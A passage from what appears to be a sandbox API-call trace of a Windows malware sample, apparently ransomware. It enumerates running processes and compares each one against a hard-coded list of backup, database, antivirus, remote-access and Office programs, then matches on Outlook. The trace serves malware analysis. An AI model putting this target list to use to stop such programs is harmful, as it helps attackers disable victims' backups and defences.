(lpString1="notepad", lpString2="wordpad") returned -1 [0064.938] lstrcmpiA (lpString1="notepad", lpString2="bedbh") returned 1 [0064.938] lstrcmpiA (lpString1="notepad", lpString2="vxmon") returned -1 [0064.938] lstrcmpiA (lpString1="notepad", lpString2="benetns") returned 1 [0064.938] lstrcmpiA (lpString1="notepad", lpString2="bengien") returned 1 [0064.938] lstrcmpiA (lpString1="notepad", lpString2="pvlsvr") returned -1 [0064.938] lstrcmpiA (lpString1="notepad", lpString2="beserver") returned 1 [0064.939] lstrcmpiA (lpString1="notepad", lpString2="raw_agent_svc") returned -1 [0064.939] lstrcmpiA (lpString1="notepad", lpString2="vsnapvss") returned -1 [0064.939] lstrcmpiA (lpString1="notepad", lpString2="CagService") returned 1 [0064.939] lstrcmpiA (lpString1="notepad", lpString2="DellSystemDetect") returned 1 [0064.939] lstrcmpiA (lpString1="notepad", lpString2="EnterpriseClient") returned 1 [0064.939] lstrcmpiA (lpString1="notepad", lpString2="VeeamNFSSvc") returned -1 [0064.939] lstrcmpiA (lpString1="notepad", lpString2="VeeamTransportSvc") returned -1 [0064.939] lstrcmpiA (lpString1="notepad", lpString2="VeeamDeploymentSvc") returned -1 [0064.939] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x81c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0064.940] PathRemoveExtensionA (in: pszPath="operamail.exe" | out: pszPath="operamail") [0064.940] lstrcmpiA (lpString1="operamail", lpString2="wxServer") returned -1 [0064.940] lstrcmpiA (lpString1="operamail", lpString2="wxServerView") returned -1 [0064.940] lstrcmpiA (lpString1="operamail", lpString2="Sqlservr") returned -1 [0064.940] lstrcmpiA (lpString1="operamail", lpString2="RAgui") returned -1 [0064.940] lstrcmpiA (lpString1="operamail", lpString2="supervise") returned -1 [0064.940] lstrcmpiA (lpString1="operamail", lpString2="Culture") returned 1 [0064.940] lstrcmpiA (lpString1="operamail", lpString2="RTVscan") returned -1 [0064.940] lstrcmpiA (lpString1="operamail", lpString2="Defwatch") returned 1 [0064.940] lstrcmpiA (lpString1="operamail", lpString2="sqlbrowser") returned -1 [0064.940] lstrcmpiA (lpString1="operamail", lpString2="winword") returned -1 [0064.940] lstrcmpiA (lpString1="operamail", lpString2="QBW32") returned -1 [0064.940] lstrcmpiA (lpString1="operamail", lpString2="QBDBMgr") returned -1 [0064.940] lstrcmpiA (lpString1="operamail", lpString2="qbupdate") returned -1 [0064.940] lstrcmpiA (lpString1="operamail", lpString2="QBCFMonitorService") returned -1 [0064.940] lstrcmpiA (lpString1="operamail", lpString2="axlbridge") returned 1 [0064.940] lstrcmpiA (lpString1="operamail", lpString2="QBIDPService") returned -1 [0064.940] lstrcmpiA (lpString1="operamail", lpString2="httpd") returned 1 [0064.940] lstrcmpiA (lpString1="operamail", lpString2="fdlauncher") returned 1 [0064.940] lstrcmpiA (lpString1="operamail", lpString2="MsDtSrvr") returned 1 [0064.940] lstrcmpiA (lpString1="operamail", lpString2="tomcat6") returned -1 [0064.940] lstrcmpiA (lpString1="operamail", lpString2="java") returned 1 [0064.940] lstrcmpiA (lpString1="operamail", lpString2="360se") returned 1 [0064.940] lstrcmpiA (lpString1="operamail", lpString2="360doctor") returned 1 [0064.941] lstrcmpiA (lpString1="operamail", lpString2="wdswfsafe") returned -1 [0064.941] lstrcmpiA (lpString1="operamail", lpString2="fdhost") returned 1 [0064.941] lstrcmpiA (lpString1="operamail", lpString2="GDscan") returned 1 [0064.941] lstrcmpiA (lpString1="operamail", lpString2="ZhuDongFangYu") returned -1 [0064.941] lstrcmpiA (lpString1="operamail", lpString2="QBDBMgrN") returned -1 [0064.941] lstrcmpiA (lpString1="operamail", lpString2="sqlwriter") returned -1 [0064.941] lstrcmpiA (lpString1="operamail", lpString2="mysqld") returned 1 [0064.941] lstrcmpiA (lpString1="operamail", lpString2="AutodeskDesktopApp") returned 1 [0064.941] lstrcmpiA (lpString1="operamail", lpString2="acwebbrowser") returned 1 [0064.941] lstrcmpiA (lpString1="operamail", lpString2="Creative Cloud") returned 1 [0064.941] lstrcmpiA (lpString1="operamail", lpString2="Adobe Desktop Service") returned 1 [0064.941] lstrcmpiA (lpString1="operamail", lpString2="CoreSync") returned 1 [0064.941] lstrcmpiA (lpString1="operamail", lpString2="Adobe CEF Helper") returned 1 [0064.941] lstrcmpiA (lpString1="operamail", lpString2="node") returned 1 [0064.941] lstrcmpiA (lpString1="operamail", lpString2="AdobeIPCBroker") returned 1 [0064.941] lstrcmpiA (lpString1="operamail", lpString2="sync-taskbar") returned -1 [0064.941] lstrcmpiA (lpString1="operamail", lpString2="sync-worker") returned -1 [0064.941] lstrcmpiA (lpString1="operamail", lpString2="InputPersonalization") returned 1 [0064.941] lstrcmpiA (lpString1="operamail", lpString2="AdobeCollabSync") returned 1 [0064.941] lstrcmpiA (lpString1="operamail", lpString2="BrCtrlCntr") returned 1 [0064.941] lstrcmpiA (lpString1="operamail", lpString2="BrCcUxSys") returned 1 [0064.941] lstrcmpiA (lpString1="operamail", lpString2="SimplyConnectionManager") returned -1 [0064.941] lstrcmpiA (lpString1="operamail", lpString2="Simply.SystemTrayIcon") returned -1 [0064.941] lstrcmpiA (lpString1="operamail", lpString2="fbguard") returned 1 [0064.941] lstrcmpiA (lpString1="operamail", lpString2="fbserver") returned 1 [0064.941] lstrcmpiA (lpString1="operamail", lpString2="ONENOTEM") returned 1 [0064.941] lstrcmpiA (lpString1="operamail", lpString2="YooIT") returned -1 [0064.942] lstrcmpiA (lpString1="operamail", lpString2="wsa_service") returned -1 [0064.942] lstrcmpiA (lpString1="operamail", lpString2="koaly-exp-engine-service") returned 1 [0064.942] lstrcmpiA (lpString1="operamail", lpString2="TeamViewer_Service") returned -1 [0064.942] lstrcmpiA (lpString1="operamail", lpString2="TeamViewer") returned -1 [0064.942] lstrcmpiA (lpString1="operamail", lpString2="tv_w32") returned -1 [0064.942] lstrcmpiA (lpString1="operamail", lpString2="tv_x64") returned -1 [0064.942] lstrcmpiA (lpString1="operamail", lpString2="TitanV") returned -1 [0064.942] lstrcmpiA (lpString1="operamail", lpString2="Ssms") returned -1 [0064.942] lstrcmpiA (lpString1="operamail", lpString2="notepad") returned 1 [0064.942] lstrcmpiA (lpString1="operamail", lpString2="RdrCEF") returned -1 [0064.942] lstrcmpiA (lpString1="operamail", lpString2="sam") returned -1 [0064.942] lstrcmpiA (lpString1="operamail", lpString2="sql") returned -1 [0064.942] lstrcmpiA (lpString1="operamail", lpString2="oracle") returned -1 [0064.942] lstrcmpiA (lpString1="operamail", lpString2="ocssd") returned 1 [0064.942] lstrcmpiA (lpString1="operamail", lpString2="dbsnmp") returned 1 [0064.942] lstrcmpiA (lpString1="operamail", lpString2="synctime") returned -1 [0064.942] lstrcmpiA (lpString1="operamail", lpString2="agntsvc") returned 1 [0064.942] lstrcmpiA (lpString1="operamail", lpString2="isqlplussvc") returned 1 [0064.942] lstrcmpiA (lpString1="operamail", lpString2="xfssvccon") returned -1 [0064.942] lstrcmpiA (lpString1="operamail", lpString2="mydesktopservice") returned 1 [0064.942] lstrcmpiA (lpString1="operamail", lpString2="ocautoupds") returned 1 [0064.942] lstrcmpiA (lpString1="operamail", lpString2="encsvc") returned 1 [0064.942] lstrcmpiA (lpString1="operamail", lpString2="firefox") returned 1 [0064.942] lstrcmpiA (lpString1="operamail", lpString2="tbirdconfig") returned -1 [0064.942] lstrcmpiA (lpString1="operamail", lpString2="mydesktopqos") returned 1 [0064.943] lstrcmpiA (lpString1="operamail", lpString2="ocomm") returned 1 [0064.943] lstrcmpiA (lpString1="operamail", lpString2="dbeng50") returned 1 [0064.943] lstrcmpiA (lpString1="operamail", lpString2="sqbcoreservice") returned -1 [0064.943] lstrcmpiA (lpString1="operamail", lpString2="excel") returned 1 [0064.943] lstrcmpiA (lpString1="operamail", lpString2="infopath") returned 1 [0064.943] lstrcmpiA (lpString1="operamail", lpString2="msaccess") returned 1 [0064.943] lstrcmpiA (lpString1="operamail", lpString2="mspub") returned 1 [0064.943] lstrcmpiA (lpString1="operamail", lpString2="onenote") returned 1 [0064.943] lstrcmpiA (lpString1="operamail", lpString2="outlook") returned -1 [0064.943] lstrcmpiA (lpString1="operamail", lpString2="powerpnt") returned -1 [0064.943] lstrcmpiA (lpString1="operamail", lpString2="steam") returned -1 [0064.943] lstrcmpiA (lpString1="operamail", lpString2="thebat") returned -1 [0064.943] lstrcmpiA (lpString1="operamail", lpString2="thunderbird") returned -1 [0064.943] lstrcmpiA (lpString1="operamail", lpString2="visio") returned -1 [0064.943] lstrcmpiA (lpString1="operamail", lpString2="winword") returned -1 [0064.943] lstrcmpiA (lpString1="operamail", lpString2="wordpad") returned -1 [0064.943] lstrcmpiA (lpString1="operamail", lpString2="bedbh") returned 1 [0064.943] lstrcmpiA (lpString1="operamail", lpString2="vxmon") returned -1 [0064.943] lstrcmpiA (lpString1="operamail", lpString2="benetns") returned 1 [0064.943] lstrcmpiA (lpString1="operamail", lpString2="bengien") returned 1 [0064.943] lstrcmpiA (lpString1="operamail", lpString2="pvlsvr") returned -1 [0064.943] lstrcmpiA (lpString1="operamail", lpString2="beserver") returned 1 [0064.943] lstrcmpiA (lpString1="operamail", lpString2="raw_agent_svc") returned -1 [0064.943] lstrcmpiA (lpString1="operamail", lpString2="vsnapvss") returned -1 [0064.943] lstrcmpiA (lpString1="operamail", lpString2="CagService") returned 1 [0064.944] lstrcmpiA (lpString1="operamail", lpString2="DellSystemDetect") returned 1 [0064.944] lstrcmpiA (lpString1="operamail", lpString2="EnterpriseClient") returned 1 [0064.944] lstrcmpiA (lpString1="operamail", lpString2="VeeamNFSSvc") returned -1 [0064.944] lstrcmpiA (lpString1="operamail", lpString2="VeeamTransportSvc") returned -1 [0064.944] lstrcmpiA (lpString1="operamail", lpString2="VeeamDeploymentSvc") returned -1 [0064.944] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x82c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0064.945] PathRemoveExtensionA (in: pszPath="outlook.exe" | out: pszPath="outlook") [0064.945] lstrcmpiA (lpString1="outlook", lpString2="wxServer") returned -1 [0064.945] lstrcmpiA (lpString1="outlook", lpString2="wxServerView") returned -1 [0064.945] lstrcmpiA (lpString1="outlook", lpString2="Sqlservr") returned -1 [0064.945] lstrcmpiA (lpString1="outlook", lpString2="RAgui") returned -1 [0064.945] lstrcmpiA (lpString1="outlook", lpString2="supervise") returned -1 [0064.945] lstrcmpiA (lpString1="outlook", lpString2="Culture") returned 1 [0064.945] lstrcmpiA (lpString1="outlook", lpString2="RTVscan") returned -1 [0064.945] lstrcmpiA (lpString1="outlook", lpString2="Defwatch") returned 1 [0064.945] lstrcmpiA (lpString1="outlook", lpString2="sqlbrowser") returned -1 [0064.945] lstrcmpiA (lpString1="outlook", lpString2="winword") returned -1 [0064.945] lstrcmpiA (lpString1="outlook", lpString2="QBW32") returned -1 [0064.946] lstrcmpiA (lpString1="outlook", lpString2="QBDBMgr") returned -1 [0064.946] lstrcmpiA (lpString1="outlook", lpString2="qbupdate") returned -1 [0064.946] lstrcmpiA (lpString1="outlook", lpString2="QBCFMonitorService") returned -1 [0064.946] lstrcmpiA (lpString1="outlook", lpString2="axlbridge") returned 1 [0064.946] lstrcmpiA (lpString1="outlook", lpString2="QBIDPService") returned -1 [0064.946] lstrcmpiA (lpString1="outlook", lpString2="httpd") returned 1 [0064.946] lstrcmpiA (lpString1="outlook", lpString2="fdlauncher") returned 1 [0064.946] lstrcmpiA (lpString1="outlook", lpString2="MsDtSrvr") returned 1 [0064.946] lstrcmpiA (lpString1="outlook", lpString2="tomcat6") returned -1 [0064.946] lstrcmpiA (lpString1="outlook", lpString2="java") returned 1 [0064.946] lstrcmpiA (lpString1="outlook", lpString2="360se") returned 1 [0064.946] lstrcmpiA (lpString1="outlook", lpString2="360doctor") returned 1 [0064.946] lstrcmpiA (lpString1="outlook", lpString2="wdswfsafe") returned -1 [0064.946] lstrcmpiA (lpString1="outlook", lpString2="fdhost") returned 1 [0064.946] lstrcmpiA (lpString1="outlook", lpString2="GDscan") returned 1 [0064.946] lstrcmpiA (lpString1="outlook", lpString2="ZhuDongFangYu") returned -1 [0064.946] lstrcmpiA (lpString1="outlook", lpString2="QBDBMgrN") returned -1 [0064.946] lstrcmpiA (lpString1="outlook", lpString2="sqlwriter") returned -1 [0064.946] lstrcmpiA (lpString1="outlook", lpString2="mysqld") returned 1 [0064.946] lstrcmpiA (lpString1="outlook", lpString2="AutodeskDesktopApp") returned 1 [0064.946] lstrcmpiA (lpString1="outlook", lpString2="acwebbrowser") returned 1 [0064.946] lstrcmpiA (lpString1="outlook", lpString2="Creative Cloud") returned 1 [0064.946] lstrcmpiA (lpString1="outlook", lpString2="Adobe Desktop Service") returned 1 [0064.946] lstrcmpiA (lpString1="outlook", lpString2="CoreSync") returned 1 [0064.946] lstrcmpiA (lpString1="outlook", lpString2="Adobe CEF Helper") returned 1 [0064.947] lstrcmpiA (lpString1="outlook", lpString2="node") returned 1 [0064.947] lstrcmpiA (lpString1="outlook", lpString2="AdobeIPCBroker") returned 1 [0064.947] lstrcmpiA (lpString1="outlook", lpString2="sync-taskbar") returned -1 [0064.947] lstrcmpiA (lpString1="outlook", lpString2="sync-worker") returned -1 [0064.947] lstrcmpiA (lpString1="outlook", lpString2="InputPersonalization") returned 1 [0064.947] lstrcmpiA (lpString1="outlook", lpString2="AdobeCollabSync") returned 1 [0064.947] lstrcmpiA (lpString1="outlook", lpString2="BrCtrlCntr") returned 1 [0064.947] lstrcmpiA (lpString1="outlook", lpString2="BrCcUxSys") returned 1 [0064.947] lstrcmpiA (lpString1="outlook", lpString2="SimplyConnectionManager") returned -1 [0064.947] lstrcmpiA (lpString1="outlook", lpString2="Simply.SystemTrayIcon") returned -1 [0064.947] lstrcmpiA (lpString1="outlook", lpString2="fbguard") returned 1 [0064.947] lstrcmpiA (lpString1="outlook", lpString2="fbserver") returned 1 [0064.947] lstrcmpiA (lpString1="outlook", lpString2="ONENOTEM") returned 1 [0064.947] lstrcmpiA (lpString1="outlook", lpString2="YooIT") returned -1 [0064.947] lstrcmpiA (lpString1="outlook", lpString2="wsa_service") returned -1 [0064.947] lstrcmpiA (lpString1="outlook", lpString2="koaly-exp-engine-service") returned 1 [0064.947] lstrcmpiA (lpString1="outlook", lpString2="TeamViewer_Service") returned -1 [0064.947] lstrcmpiA (lpString1="outlook", lpString2="TeamViewer") returned -1 [0064.947] lstrcmpiA (lpString1="outlook", lpString2="tv_w32") returned -1 [0064.947] lstrcmpiA (lpString1="outlook", lpString2="tv_x64") returned -1 [0064.947] lstrcmpiA (lpString1="outlook", lpString2="TitanV") returned -1 [0064.947] lstrcmpiA (lpString1="outlook", lpString2="Ssms") returned -1 [0064.947] lstrcmpiA (lpString1="outlook", lpString2="notepad") returned 1 [0064.947] lstrcmpiA (lpString1="outlook", lpString2="RdrCEF") returned -1 [0064.948] lstrcmpiA (lpString1="outlook", lpString2="sam") returned -1 [0064.948] lstrcmpiA (lpString1="outlook", lpString2="sql") returned -1 [0064.948] lstrcmpiA (lpString1="outlook", lpString2="oracle") returned 1 [0064.948] lstrcmpiA (lpString1="outlook", lpString2="ocssd") returned 1 [0064.948] lstrcmpiA (lpString1="outlook", lpString2="dbsnmp") returned 1 [0064.948] lstrcmpiA (lpString1="outlook", lpString2="synctime") returned -1 [0064.948] lstrcmpiA (lpString1="outlook", lpString2="agntsvc") returned 1 [0064.948] lstrcmpiA (lpString1="outlook", lpString2="isqlplussvc") returned 1 [0064.948] lstrcmpiA (lpString1="outlook", lpString2="xfssvccon") returned -1 [0064.948] lstrcmpiA (lpString1="outlook", lpString2="mydesktopservice") returned 1 [0064.948] lstrcmpiA (lpString1="outlook", lpString2="ocautoupds") returned 1 [0064.948] lstrcmpiA (lpString1="outlook", lpString2="encsvc") returned 1 [0064.948] lstrcmpiA (lpString1="outlook", lpString2="firefox") returned 1 [0064.948] lstrcmpiA (lpString1="outlook", lpString2="tbirdconfig") returned -1 [0064.948] lstrcmpiA (lpString1="outlook", lpString2="mydesktopqos") returned 1 [0064.948] lstrcmpiA (lpString1="outlook", lpString2="ocomm") returned 1 [0064.948] lstrcmpiA (lpString1="outlook", lpString2="dbeng50") returned 1 [0064.948] lstrcmpiA (lpString1="outlook", lpString2="sqbcoreservice") returned -1 [0064.948] lstrcmpiA (lpString1="outlook", lpString2="excel") returned 1 [0064.948] lstrcmpiA (lpString1="outlook", lpString2="infopath") returned 1 [0064.948] lstrcmpiA (lpString1="outlook", lpString2="msaccess") returned 1 [0064.948] lstrcmpiA (lpString1="outlook", lpString2="mspub") returned 1 [0064.948] lstrcmpiA (lpString1="outlook", lpString2="onenote") returned 1 [0064.948] lstrcmpiA (lpString1="outlook", lpString2="outlook") returned 0 [0064.948] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x198 [0064.953] Process32First (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0064.953] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0064.954] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0064.955] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0064.956] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0064.957] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0064.957] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0064.958] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0064.959] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0064.959] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0064.960] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.961] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.962] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.962] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.963] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.964] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0064.965] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.966] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.967] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0064.967] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0064.968] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0064.969] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.969] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0064.970] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0064.971] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="allow_south.exe")) returned 1 [0064.972] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="killed-dependent.exe")) returned 1 [0064.972] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x730, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mercury.exe")) returned 1 [0064.973] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="smithsonian_census_litigation.exe")) returned 1 [0064.974] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x60c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="hrs.exe")) returned 1 [0064.974] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x20c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="combined nearest.exe")) returned 1 [0064.975] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="equations.exe")) returned 1 [0064.976] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="pubmed-ranging-expired.exe")) returned 1 [0064.976] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ng microphone options.exe")) returned 1 [0064.977] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="perspectivesimagineclassics.exe")) returned 1 [0064.978] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="exposure.exe")) returned 1 [0064.978] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, 